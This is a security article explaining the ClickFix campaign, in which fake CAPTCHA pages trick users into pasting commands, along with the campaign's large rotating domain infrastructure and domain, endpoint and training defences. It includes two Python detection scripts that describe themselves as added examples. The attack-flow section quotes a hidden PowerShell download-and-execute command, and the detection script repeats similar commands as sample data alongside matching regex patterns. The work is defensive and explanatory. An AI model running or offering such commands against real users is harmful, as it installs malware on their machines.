
ClickFix’s Domain Army: 13,000+ Domains, Massive Attack Surface

[Figure: visualization of domain network overlays in malware campaigns. Caption: domain proliferation visualizes how attackers weaponize thousands of domains for browser exploitation.]

In mid-2025, security researchers noticed a sudden, coordinated increase in malicious domain registrations. Over 13,000 unique domains were linked to an emerging campaign known as ClickFix. Because this operation relies on user interaction rather than software flaws, it spreads rapidly and evades most automated filters.

The technique combines social engineering with automation. As a result, it creates a dangerous intersection between user trust and large-scale domain abuse. This article explores how the ClickFix campaign works, why it has become so effective, and how organizations can limit its impact.

What Is the ClickFix Campaign?

ClickFix is a browser-based social engineering attack. Victims first encounter what looks like a legitimate CAPTCHA test. Immediately afterward, the page asks them to copy and paste a short command into a terminal or console window. Because the prompt appears harmless, many users comply. However, that simple action downloads and executes hidden malware within seconds.

Unlike classic phishing that steals credentials, ClickFix manipulates behavior. It convinces the target to run malicious code voluntarily. Consequently, it bypasses email gateways, antivirus filters, and browser warnings that depend on detecting automatic downloads.

Security advisories, including one from the U.S. Department of Health and Human Services, describe how these prompts mimic real verification pages. Meanwhile, a detailed report from Group-IB explains how attackers manipulate browser workflows and clipboards to deliver payloads discreetly. 

Domain Infrastructure and Scale

Because ClickFix depends on thousands of active URLs, attackers built an automated registration system that continuously creates and retires domains. Through API access and disposable payment methods, each malicious site stays online only briefly. As a result, detection tools struggle to keep pace.

Moreover, roughly a quarter of the observed domains rely on Cloudflare infrastructure, while others use hundreds of smaller providers scattered worldwide. This diversity complicates any large-scale blocking effort. Some domains even exploit forgotten subdomains or outdated academic sites. By hiding within known networks, these actors gain additional credibility.

Furthermore, the registration footprint extends across multiple regions, including the United States, Germany, Indonesia, and Brazil. Therefore, even if one registrar takes action, others continue to enable the campaign’s spread. 

Attack Flow and Tactics

The ClickFix attack sequence follows a predictable pattern. First, the victim arrives on a compromised or newly registered domain. Next, the page displays a CAPTCHA prompt claiming to verify that the visitor is human. When the user clicks through, a hidden script copies a command to the clipboard. Then, an instruction appears, urging the visitor to paste it into a console to “continue.”

Once executed, the command downloads and launches a secondary payload, often a VBScript or PowerShell snippet. For example:

cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o %TEMP%\captcha.vbs; Start-Process %TEMP%\captcha.vbs

Because the process relies entirely on user interaction, most security tools see no abnormal behavior until it is too late. Furthermore, attackers frequently rotate URLs or rename scripts to avoid detection.

Why Large-Scale Domain Abuse Works

The success of this campaign rests on three key factors: low cost, automation, and speed. Domain names are inexpensive, so registering thousands barely impacts an attacker’s budget. In addition, modern registrar APIs simplify creation and deletion cycles. Consequently, defenders find themselves chasing an ever-changing list of hostnames.

Moreover, reputation-based filters depend on historical data. Since ClickFix domains rarely live more than a few days, blacklists remain perpetually behind. Attackers also disguise their registrations by using ordinary TLDs and familiar hosting providers, which makes suspicious patterns harder to identify.

Academic research confirms this reality. For instance, a study titled “Registration, Detection, and Deregistration” demonstrates that phishing and malware domains often remain active for days even after discovery.

At the same time, DNS dynamic update vulnerabilities can allow adversaries to hijack zones or redirect traffic without registering new domains at all. 

Historically, large-scale domain abuse has powered major phishing and malware waves. For example, earlier research into malicious URL campaigns revealed that attackers create thousands of disposable sites during every operation. As a result, traditional detection techniques rarely prevent the first wave of infections.

Defense Strategies and Mitigation

Because the ClickFix campaign depends on human behavior, defense requires both technical and organizational measures.

At the Domain and DNS Level:
Organizations should monitor new domain registrations that resemble their brands or product names. In addition, integrating domain reputation feeds and automated look-alike detection can expose suspicious activity early. Collaboration with registrars enables faster takedowns, while DNS filtering helps block entire domain clusters proactively.
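The look-alike and new-registration monitoring described above can be turned into a simple triage pass over a newly-registered-domain feed. The following is an added example, not code from the article or from any product it mentions: the feed entries, the brand token list, the lure-word list, the age threshold and the scoring weights are all constructed assumptions, chosen to reflect the traits the article attributes to ClickFix domains (brand resemblance, CAPTCHA and "verify you are human" vocabulary, and very short lifetimes).

```python
"""Triage a newly-registered-domain feed for ClickFix-style look-alikes.

Added example, not code from the original article. The feed entries,
brand list, lure words and scoring thresholds are constructed
assumptions for illustration.
"""
import re
from datetime import date

# Constructed sample feed: (domain, registration date, hosting provider).
SAMPLE_FEED = [
    ("examplebank-verify.com", date(2025, 6, 2), "cloudflare"),
    ("examp1ebank.net", date(2025, 6, 3), "small-host-17"),
    ("human-check-captcha.top", date(2025, 6, 3), "cloudflare"),
    ("weather-hobby-blog.org", date(2024, 1, 15), "small-host-2"),
    ("cf-captcha-continue.xyz", date(2025, 6, 4), "small-host-9"),
]
TODAY = date(2025, 6, 5)          # constructed "now" for the sample run

BRANDS = ["examplebank"]          # assumption: the defender's own brand tokens
LURE_WORDS = ["captcha", "verify", "human", "check", "continue", "cf-"]
NEW_DOMAIN_DAYS = 7               # assumption: what counts as "young"
FLAG_THRESHOLD = 3                # assumption: minimum score to escalate

# Common digit-for-letter substitutions seen in look-alike names.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "7": "t"})


def levenshtein(a, b):
    """Edit distance; catches one-character brand variations."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain):
    """Crude label extraction: everything left of the last dot.
    A real deployment would consult a public-suffix list instead."""
    return domain.lower().rsplit(".", 1)[0]


def score_domain(domain, registered, provider, today):
    """Return (score, reasons) for one feed entry. The provider is not
    scored (the article notes legitimate providers are used heavily);
    it is carried through for analyst context only."""
    score, reasons = 0, []
    label = registrable_label(domain)
    normalized = label.translate(HOMOGLYPHS)

    # Brand look-alike: exact token, or within one edit after homoglyph folding.
    for token in re.split(r"[-.]", normalized):
        for brand in BRANDS:
            if token == brand or levenshtein(token, brand) <= 1:
                score += 3
                reasons.append(f"brand look-alike: {brand}")
                break

    # CAPTCHA / "verify you are human" vocabulary typical of the lure pages.
    for word in LURE_WORDS:
        if word in label:
            score += 1
            reasons.append(f"lure word: {word}")

    # Registration age: the campaign rotates domains within days.
    age = (today - registered).days
    if age <= NEW_DOMAIN_DAYS:
        score += 2
        reasons.append(f"registered {age} days ago")

    return score, reasons


def triage(feed, today):
    """Return flagged entries sorted by descending score."""
    flagged = []
    for domain, registered, provider in feed:
        score, reasons = score_domain(domain, registered, provider, today)
        if score >= FLAG_THRESHOLD:
            flagged.append({"domain": domain, "score": score,
                            "provider": provider, "reasons": reasons})
    return sorted(flagged, key=lambda e: e["score"], reverse=True)


if __name__ == "__main__":
    for entry in triage(SAMPLE_FEED, TODAY):
        print(f"{entry['score']:>2}  {entry['domain']:<26} "
              f"{entry['provider']:<14} {'; '.join(entry['reasons'])}")
```

On the constructed feed, four of the five domains are escalated and the old hobby blog is not. The weights deliberately favour brand resemblance over registration age alone, since a young domain with no lure vocabulary is common and would otherwise flood the queue; tune both against your own feed before relying on the output.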

At the Endpoint and Network Layer:
Endpoint Detection and Response systems must block unauthorized PowerShell or script execution. Furthermore, administrators should create policies that flag clipboard-triggered downloads. When combined with browser hardening and content security policies, these rules limit execution chains before they succeed.
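The download-and-execute chain shown in the Attack Flow section (a console spawned from the desktop or browser, a `curl`/`Invoke-WebRequest` fetch into `%TEMP%`, then `Start-Process` or a script host launching the dropped `.vbs`) is visible in ordinary process-creation telemetry even though nothing was auto-downloaded. The following is an added example, not code from the article or from any EDR product: it scores constructed Sysmon-style process-creation records against that pattern. The events, the indicator regexes, the weights and the threshold are assumptions; the lure URLs are placeholders and not the domain quoted in the article.

```python
"""Flag ClickFix-style download-and-execute command lines in process
creation telemetry.

Added example, not code from the original article. The events are
constructed Sysmon-like process-creation records; indicator regexes,
weights and the threshold are assumptions for illustration.
"""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c start /min powershell -Command curl.exe -s "
                r"https://lure-domain.example/captcha.txt -o %TEMP%\captcha.vbs; "
                r"Start-Process %TEMP%\captcha.vbs"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -Command Get-Date"},
    {"id": 3, "parent": r"C:\Program Files\DevTool\devtool.exe", "image": PS,
     "cmdline": r"powershell -Command Invoke-WebRequest "
                r"https://packages.internal.example/tool.zip -OutFile C:\dev\tool.zip"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r'powershell -w hidden -c "iwr https://other-lure.example/check.txt '
                r'-OutFile $env:TEMP\check.vbs; wscript $env:TEMP\check.vbs"'},
]

# (name, regex over the lower-cased command line, weight). Assumed values.
INDICATORS = [
    ("download", r"curl(\.exe)?\s|\biwr\b|invoke-webrequest|downloadstring"
                 r"|downloadfile|start-bitstransfer", 2),
    ("execute", r"start-process|\b[wc]script(\.exe)?\b|\.vbs\b|\.hta\b"
                r"|\biex\b|invoke-expression", 2),
    ("temp_path", r"%temp%|\$env:temp\b|\\appdata\\local\\temp", 1),
    ("hidden_window", r"start /min|-w(indowstyle)? hidden", 1),
]
# Parents from which a pasted command would typically be launched
# (Run dialog via explorer.exe, or a browser's own terminal-like prompt).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
FLAG_THRESHOLD = 5   # assumption


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, matched indicator names) for one process-creation record."""
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return 0, []
    cmd = event["cmdline"].lower()
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, cmd):
            score += weight
            hits.append(name)
    if basename(event["parent"]) in INTERACTIVE_PARENTS:
        score += 1
        hits.append("interactive_parent")
    return score, hits


def detect(events):
    """Flag events that both fetch and execute something and clear the threshold."""
    flagged = []
    for event in events:
        score, hits = score_event(event)
        if score >= FLAG_THRESHOLD and "download" in hits and "execute" in hits:
            flagged.append({"id": event["id"], "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"event {hit['id']}: score {hit['score']} ({', '.join(hit['indicators'])})")
```

Events 1 and 4 are flagged (both fetch a file into the temp directory and then launch it from a console spawned by explorer.exe); the developer's package download in event 3 fetches but never executes, and the interactive `Get-Date` in event 2 has no download at all. Requiring both a fetch and an execute indicator, rather than a bare score, is what keeps ordinary scripted downloads out of the alert queue; the URL itself is intentionally not part of the logic, because the article's point is that the hostnames rotate faster than any list can follow.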

At the Organizational Level:
Security awareness training remains essential. Users should understand that no legitimate service ever requires pasting commands from a web page into a terminal. Additionally, applying least-privilege principles reduces potential damage if someone executes a malicious script. Finally, clear incident response playbooks streamline takedown requests and external coordination.

The ClickFix campaign demonstrates how social engineering, when scaled through automation, can rival advanced malware in effectiveness. Although the method appears simple, its execution across 13,000 domains proves how persistence and volume can overcome traditional defenses.

Therefore, defenders must look beyond endpoint alerts and examine domain-level intelligence. By combining monitoring, DNS control, behavioral analytics, and user education, organizations can finally close the gap attackers exploit so effectively.

FAQs

What exactly is ClickFix?
ClickFix is a browser-based attack that tricks users into pasting and executing malicious code under the guise of CAPTCHA validation.

How can attackers manage 13,000 domains?
They use automated scripts and registrar APIs to create, update, and remove domains in bulk, ensuring constant availability.

Can defenders block rotating domains effectively?
Yes. Combining domain-reputation feeds, DNS filtering, and registrar partnerships allows near-real-time blocking.

Which malware families use ClickFix?
ClickFix has delivered infostealers, remote access trojans, and loader scripts tied to known threat groups.
